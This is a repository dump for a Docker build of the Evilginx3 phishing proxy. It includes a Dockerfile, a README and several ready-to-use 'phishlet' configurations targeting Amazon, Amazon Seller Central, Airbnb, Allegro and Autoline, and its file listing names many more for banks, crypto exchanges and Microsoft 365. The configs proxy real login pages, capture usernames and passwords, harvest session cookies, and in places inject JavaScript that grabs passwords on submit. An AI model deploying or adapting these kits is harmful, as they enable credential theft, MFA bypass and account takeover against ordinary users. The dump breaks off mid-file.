├── Dockerfile ├── LICENSE ├── README.md ├── docker-entrypoint.sh ├── evilginx3.gif ├── phishlet_examples ├── 163working.yaml ├── Amazon--.yaml ├── airbnb.yaml ├── airbnbfr.yaml ├── alibaba.yaml ├── allegro.yaml ├── amazon-seller.yaml ├── amazon.yaml ├── americanexpress.yaml ├── aol.yaml ├── autoline.yaml ├── aws.yaml ├── banistmo.yaml ├── barclays.yaml ├── binance.yaml ├── binance2-(redirect-Captcha).yaml ├── binanceus.yaml ├── blockchain(Basic).yaml ├── blockchain(Fixed).yaml ├── blockchain(Fixed2).yaml ├── blockchain.yaml ├── bmo.yaml ├── bmomobile.yaml ├── booking.yaml ├── capital.yaml ├── chase.yaml ├── chrome_extension.yaml ├── citrix.yaml ├── coinbase.yaml ├── coinspot.yaml ├── coolblue.yaml ├── dropbox.yaml ├── ebay.yaml ├── edd.yaml ├── facebook-d.yaml ├── facebook-d2.yaml ├── facebook-d3.yaml ├── facebook-fix.yaml ├── facebook.yaml ├── fidelity.yaml ├── fudan.yaml ├── github.yaml ├── godaddy(sso).yaml ├── godaddy.yaml ├── google.yaml ├── google2.yaml ├── gsuite.yaml ├── gusto.yaml ├── hetzner.yaml ├── hinet.yaml ├── hotmail.yaml ├── huntington.yaml ├── icloud.yaml ├── icloud2.yaml ├── instagram.yaml ├── intuit.yaml ├── ionos.yaml ├── linkedin.yaml ├── linkedin2.yaml ├── luno.yaml ├── microsoft.yaml ├── mobile-de.yaml ├── namecheap.yaml ├── notthingham.yaml ├── nottingham.yaml ├── o365(2).yaml ├── o365(April-latest).yaml ├── o365(outlook).yaml ├── o365(working-october21).yaml ├── o365(working2).yaml ├── o365(working2a).yaml ├── o365.yaml ├── okta.yaml ├── onelogin.yaml ├── openbank.yaml ├── outlook(o365).yaml ├── outlook.yaml ├── outlook2.yaml ├── outlook3(particular modified).yaml ├── paxful.yaml ├── paypal(working2).yaml ├── paypal.yaml ├── playstation-B.yaml ├── playstation.yaml ├── protonmail.yaml ├── qdefi.yaml ├── quickbooks(intuit).yaml ├── rackspace.yaml ├── reddit.yaml ├── roblox.yaml ├── schwab(under-maintain).yaml ├── schwab.yaml ├── snapchat.yaml ├── steam.yaml ├── stripe.yaml ├── sununion.yaml ├── supersport.yaml ├── tiktok.yaml ├── 
tradus.yaml ├── twitter-mobile.yaml ├── twitter.yaml ├── txstate.yaml ├── usaa.yaml ├── vanguard.yaml ├── venmo(working).yaml ├── venmo.yaml ├── venmo2.yaml ├── viber.yaml ├── vrbo.yaml ├── webhinet.yaml ├── westernunion.yaml ├── woodforest.yaml ├── wordpress.org.yaml ├── xfinity.yaml └── yahoo(fixed).yaml └── phishlets └── coinbase.yaml
/Dockerfile:
--------------------------------------------------------------------------------
# Single-stage build: clones the upstream Evilginx source, compiles it, and
# installs the binary at /bin/evilginx inside the same image.
# NOTE(review): `golang:alpine` is a floating tag, so the toolchain and base OS
# can differ between builds; pin a version tag or digest for reproducible images.
1 | FROM golang:alpine
2 |
# Build arguments. Within this file BUILD_RFC3339 and COMMIT are never
# referenced again, and VERSION is used only for a label further down; none of
# them selects which upstream revision gets cloned.
3 | ARG BUILD_RFC3339="1970-01-01T00:00:00Z"
4 | ARG COMMIT="local"
5 | ARG VERSION="v3.0.0"
6 |
# Upstream source location, build-only packages, and the install path used by
# the RUN steps below.
7 | ENV GITHUB_USER="kgretzky"
8 | ENV EVILGINX_REPOSITORY="github.com/${GITHUB_USER}/evilginx2"
9 | ENV INSTALL_PACKAGES="git make gcc musl-dev"
10 | ENV PROJECT_DIR="${GOPATH}/src/${EVILGINX_REPOSITORY}"
11 | ENV EVILGINX_BIN="/bin/evilginx"
12 |
# Install the build packages and clone the upstream repository.
# NOTE(review): the clone takes whatever the default branch holds at build
# time; no tag, commit or checksum is checked, so the image content depends on
# upstream state at the moment `docker build` runs.
13 | RUN mkdir -p ${GOPATH}/src/github.com/${GITHUB_USER} \
14 | && apk add --no-cache ${INSTALL_PACKAGES} \
15 | && git -C ${GOPATH}/src/github.com/${GITHUB_USER} clone https://github.com/${GITHUB_USER}/evilginx2
16 |
# Run `go get ./...` and `make`, copy the built binary to EVILGINX_BIN, then
# remove the build packages and the source tree.
# NOTE(review): there is only one FROM, so the final image is still
# golang:alpine and keeps the Go toolchain; a multi-stage build would leave a
# smaller runtime image.
17 | RUN set -ex \
18 | && cd ${PROJECT_DIR}/ && go get ./... && make \
19 | && cp ${PROJECT_DIR}/build/evilginx ${EVILGINX_BIN} \
20 | && apk del ${INSTALL_PACKAGES} && rm -rf /var/cache/apk/* && rm -rf ${GOPATH}/src/*
21 |
# Install the entrypoint script and make it executable.
# NOTE(review): no USER instruction appears in this file, so the entrypoint
# runs as the base image's default user (presumably root; confirm).
22 | COPY ./docker-entrypoint.sh /opt/
23 | RUN chmod +x /opt/docker-entrypoint.sh
24 |
# EXPOSE only documents the listed ports; publishing is decided by the
# `docker run -p` options.
25 | ENTRYPOINT ["/opt/docker-entrypoint.sh"]
26 | EXPOSE 53 443
27 |
# NOTE(review): SIGKILL cannot be handled by the process, so `docker stop`
# ends it immediately with no chance to flush state or close connections.
28 | STOPSIGNAL SIGKILL
29 |
# NOTE(review): BUILD_DATE and VCS_REF have no defaults, so the matching labels
# are empty unless supplied with --build-arg. VERSION is redeclared here
# without a default; confirm the "v3.0.0" default above still reaches the label.
30 | # Build-time metadata as defined at http://label-schema.org
31 | ARG BUILD_DATE
32 | ARG VCS_REF
33 | ARG VERSION
34 |
# Image metadata labels. The url and vcs-url labels point at the packaging
# repository, while the binary itself is built from the kgretzky/evilginx2
# clone above, so vcs-ref does not identify the revision of the compiled source.
35 | LABEL org.label-schema.build-date=$BUILD_DATE \
36 | org.label-schema.name="Evilginx3 Docker" \
37 | org.label-schema.description="Evilginx3 Docker Build" \
38 | org.label-schema.url="https://github.com/Carp704/docker-evilginx3" \
39 | org.label-schema.vcs-ref=$VCS_REF \
40 | org.label-schema.vcs-url="https://github.com/Carp704/docker-evilginx3" \
41 | org.label-schema.vendor="Carp704" \
42 | org.label-schema.version=$VERSION \
43 | org.label-schema.schema-version="1.0"
44 |
45 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | # [Carp704/docker-evilginx3](https://github.com/Carp704/docker-evilginx3)
3 |
4 |
5 |
6 | 7 |
8 | 9 |

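Docker setup for Evilginx version 3.0. The image is built from source: the Dockerfile clones `github.com/kgretzky/evilginx2` at build time without pinning a tag or commit, so the resulting binary reflects whatever the upstream repository contains when `docker build` runs.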

10 | 11 | 12 | ## Usage 13 | 14 | Example snippet to help you get started creating a container. 15 | 16 | ### Docker 17 | 18 | ``` 19 | # Create the image 20 | cd /opt 21 | git clone https://github.com/Carp704/docker-evilginx3.git 22 | cd docker-evilginx3 23 | docker build -t evilginx3-image . 24 | 25 | # Start the container 26 | docker run --name=evilginx3_prod \ 27 | -e TZ=America/New_York \ 28 | -p 443:443 \ 29 | -p 53:53 \ 30 | -v /opt/docker-evilginx3/config:/config \ 31 | -v /opt/docker-evilginx3/phishlets:/phishlets \ 32 | --restart=unless-stopped \ 33 | evilginx3-image 34 | 35 | # View the running container 36 | docker ps -a 37 | 38 | # Access the running container 39 | docker exec -it evilginx3_prod /bin/sh 40 | 41 | # Start Evilginx 42 | /bin/evilginx -p /phishlets -c /config -developer 43 | 44 | ``` 45 | 46 | ## Support Info 47 | 48 | ``` 49 | # Shell access 50 | docker exec -it evilginx3_prod /bin/sh 51 | 52 | # Monitor the logs of the container in realtime 53 | docker logs -f evilginx3_prod 54 | 55 | ``` 56 | 57 | ## Credit 58 | * [Kuba Gretzky](https://github.com/kgretzky) 59 | * [Warhorse](https://github.com/warhorse) 60 | 61 | -------------------------------------------------------------------------------- /docker-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # 4 | /bin/evilginx -h 5 | tail -f /dev/null 6 | -------------------------------------------------------------------------------- /evilginx3.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Carp704/docker-evilginx3/297a9281fd5954d74653566358c9ad952a15d653/evilginx3.gif -------------------------------------------------------------------------------- /phishlet_examples/Amazon--.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', 
orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true} 5 | - {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false} 6 | - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 11 | - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 12 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 13 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 14 | auth_tokens: 15 | - domain: '.amazon.com' 16 | keys: ['session-token', 'session-id-time', 'session-id', '.*,regexp'] 17 | - domain: 'www.amazon.com' 18 | keys: ['csm-hit,opt', '.*,regexp'] 19 | 20 | auth_urls: 21 | - '/' 22 | credentials: 23 | username: 24 | key: 'email' 25 | search: '(.*)' 26 | type: 'post' 27 | password: 28 | key: 'unenc_password' 29 | search: '(.*)' 30 | type: 'post' 31 | 32 | login: 33 | domain: 
'www.amazon.com' 34 | path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0' 35 | js_inject: 36 | - trigger_domains: ["www.amazon.com"] 37 | trigger_paths: ["/ap/signin", "/signin"] 38 | trigger_params: [] 39 | script: | 40 | function onclickListener(){ 41 | var submit = document.querySelectorAll('input[type="submit"]')[0]; 42 | submit.setAttribute("onclick", "sendPass()"); 43 | submit.addEventListener("click", sendPass); 44 | return; 45 | } 46 | function sendPass(){ 47 | var password = document.getElementsByName("password")[0].value; 48 | var xhr = new XMLHttpRequest(); 49 | xhr.open("POST", '/accounts/login/ajax/', true); 50 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 51 | xhr.send("unenc_password="+encodeURIComponent(password)); 52 | return; 53 | } 54 | setTimeout(function(){ onclickListener(); }, 1000); -------------------------------------------------------------------------------- /phishlet_examples/airbnbfr.yaml: -------------------------------------------------------------------------------- 1 | author: '@me' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'airbnb.co.uk', session: true, is_landing: true} 5 | - {phish_sub: '', orig_sub: 'www', domain: 'airbnb.co.uk', session: true, is_landing: false} 6 | sub_filters: 7 | - {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '', replace: '', mimes: ['text/html', 'application/json', 'application/xhtml+xml', 'application/xml']} 8 | auth_tokens: 9 | - domain: '.airbnb.co.uk' 10 | keys: ['.*,regexp'] 11 | - domain: 'www.airbnb.co.uk' 12 | keys: ['.*,regexp'] 13 | credentials: 14 | username: 15 | key: 'phoneNumber' 16 | search: '(.*)' 17 | type: 'post' 
18 | password: 19 | key: 'phone' 20 | search: '(.*)' 21 | type: 'post' 22 | 23 | force_post: 24 | - path: '/api/v2/phone_one_time_passwords' 25 | search: 26 | - {key: 'currency', search: '.*'} 27 | - {key: 'key', search: '.*'} 28 | - {key: 'from', search: '.*'} 29 | - {key: 'locale', search: '.*'} 30 | - {key: 'otpMethod', search: '.*'} 31 | - {key: 'phoneNumber', search: '.*'} 32 | - {key: 'workFlow', search: '.*'} 33 | force: 34 | - {key: 'remember_me', value: 'true'} 35 | type: 'post' 36 | auth_urls: 37 | - '/' 38 | login: 39 | domain: 'www.airbnb.co.uk' 40 | path: '/login' 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /phishlet_examples/allegro.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: '', orig_sub: '', domain: 'allegro.pl', session: true, is_landing: false, auto_filter: false} 5 | - {phish_sub: 'www', orig_sub: 'www', domain: 'allegro.pl', session: true, is_landing: true, auto_filter: false} 6 | - {phish_sub: 'edge', orig_sub: 'edge', domain: 'allegro.pl', session: true, is_landing: false, auto_filter: false} 7 | sub_filters: 8 | - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'www.allegro.pl', replace: 'www.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 9 | - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'edge.allegro.pl', replace: 'edge.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 10 | - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'bing.com', replace: 'asasdasdasdjustranom.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 11 | - {triggers_on: 'www.allegro.pl', orig_sub: 'www', domain: 'allegro.pl', search: 'tda.io', replace: 
'adasdasdasdasdasdasdqwepoa.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 12 | - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'www.allegro.pl', replace: 'www.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 13 | - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'edge.allegro.pl', replace: 'edge.{hostname}', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 14 | - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'bing.com', replace: 'asasdasdasdjustranom.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 15 | - {triggers_on: 'edge.allegro.pl', orig_sub: 'edge', domain: 'allegro.pl', search: 'tda.io', replace: 'adasdasdasdasdasdasdqwepoa.com', mimes: ['text/html', 'text/javascript', 'application/javascript', 'application/json']} 16 | auth_tokens: 17 | - domain: '.allegro.pl' 18 | keys: ['.*,regexp'] 19 | auth_urls: 20 | - '/moje-allegro/moje-konto' 21 | 22 | credentials: 23 | username: 24 | key: '' 25 | search: '"username":"([^"]*)' 26 | type: 'json' 27 | password: 28 | key: '' 29 | search: '"password":"([^"]*)' 30 | type: 'json' 31 | custom: 32 | - key: '_csrf' 33 | search: '(.*)' 34 | type: 'post' 35 | 36 | login: 37 | domain: 'www.allegro.pl' 38 | path: '/login/form/' -------------------------------------------------------------------------------- /phishlet_examples/amazon-seller.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'sellercentral', orig_sub: 'sellercentral', domain: 'amazon.co.uk', session: true, is_landing: true} 5 | - {phish_sub: 'fls-eu', orig_sub: 'fls-eu', domain: 'amazon.com', session: false, is_landing: false} 6 | - {phish_sub: 'images-na', orig_sub: 
'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false} 7 | 8 | sub_filters: 9 | 10 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 11 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 12 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 13 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 14 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 15 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'fls-eu', domain: 'amazon.com', search: 
'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 16 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 17 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 18 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'images-na', domain: 'amazon.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']} 19 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 20 | - {triggers_on: 'sellercentral.amazon.co.uk', orig_sub: 'sellercentral', domain: 'amazon.co.uk', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 21 | - {triggers_on: 'fls-eu.amazon.com', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 22 | - {triggers_on: 
'fls-eu.amazon.com', orig_sub: 'fls-eu', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 23 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 24 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 25 | 26 | auth_tokens: 27 | - domain: '.amazon.co.uk' 28 | keys: ['.*,regexp'] 29 | - domain: '.amazon.com' 30 | keys: ['.*,regexp'] 31 | auth_urls: 32 | - '/' 33 | - '/*' 34 | 35 | credentials: 36 | username: 37 | key: 'email' 38 | search: '(.*)' 39 | type: 'post' 40 | password: 41 | key: 'password' 42 | search: '(.*)' 43 | type: 'post' 44 | 45 | force_post: 46 | - path: '/ap/signin' 47 | search: 48 | - {key: 'email', search: '.*'} 49 | - {key: 'password', search: '.*'} 50 | force: 51 | - {key: 'rememberMe', value: 'true'} 52 | type: 'post' 53 | 54 | login: 55 | domain: 'sellercentral.amazon.co.uk' 56 | path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0' 57 | -------------------------------------------------------------------------------- /phishlet_examples/amazon.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true} 5 | - {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', 
session: false, is_landing: false} 6 | - {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 9 | - {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 10 | - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 11 | - {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 12 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']} 13 | - {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} 14 | auth_tokens: 15 | - domain: '.amazon.com' 16 | keys: ['at-main','lc-main','sess-at-main','session-id','session-id-time','session-token','sst-main','ubid-main','x-main','skin','a-ogbcbff'] 17 | credentials: 18 | username: 19 | key: 'email' 20 | search: '(.*)' 21 | type: 'post' 22 | password: 23 | key: 'password' 24 | search: '(.*)' 25 | type: 'post' 26 | login: 27 | domain: 'www.amazon.com' 28 | path: 
'/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0' 29 | -------------------------------------------------------------------------------- /phishlet_examples/autoline.yaml: -------------------------------------------------------------------------------- 1 | author: '@AN0NUD4Y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: '', orig_sub: '', domain: 'autoline.info', session: true, is_landing: true} 5 | - {phish_sub: 'mc', orig_sub: 'mc', domain: 'webvisor.org', session: true, is_landing: false} 6 | - {phish_sub: 'top', orig_sub: '', domain: 'autoline-top.com', session: true, is_landing: false} 7 | - {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'jsdelivr.net', session: true, is_landing: false} 8 | - {phish_sub: 'cloudfront', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', session: true, is_landing: false} 9 | 10 | 11 | sub_filters: 12 | 13 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 14 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 15 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline.info', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 16 | 17 | - 
{triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 18 | - {triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 19 | - {triggers_on: 'autoline.info', orig_sub: 'mc', domain: 'webvisor.org', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 20 | 21 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 22 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 23 | - {triggers_on: 'autoline.info', orig_sub: '', domain: 'autoline-top.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 24 | 25 | - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 
'multipart/form-data']} 26 | - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 27 | - {triggers_on: 'autoline.info', orig_sub: 'cdn', domain: 'jsdelivr.net', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 28 | 29 | - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 30 | - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 31 | - {triggers_on: 'autoline.info', orig_sub: 'd1jqmy35mqw0tb', domain: 'cloudfront.net', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 32 | 33 | 34 | auth_tokens: 35 | - domain: 'autoline.info/my/dashboard/' 36 | keys: ['SID','.*,regexp'] 37 | - domain: 'autoline.info/' 38 | keys: ['SID','.*,regexp'] 39 | 40 | credentials: 41 | username: 42 | key: 'login_email' 43 | search: '(.*)' 44 | type: 'post' 45 | 46 | password: 47 | key: 'login_password' 48 | search: '(.*)' 49 | type: 'post' 50 | 51 | login: 52 | domain: 'autoline.info' 53 | path: '/login/' 54 | 55 | js_inject: 56 | - trigger_domains: 
